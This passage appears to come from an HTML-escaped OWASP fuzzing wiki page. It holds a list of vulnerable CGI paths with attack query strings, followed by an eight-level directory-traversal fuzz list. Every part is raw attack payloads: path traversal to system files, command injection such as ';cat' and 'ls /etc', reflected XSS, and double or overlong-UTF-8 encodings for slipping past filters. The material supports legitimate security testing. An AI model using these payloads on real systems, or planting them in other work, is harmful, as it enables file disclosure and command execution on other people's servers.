sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
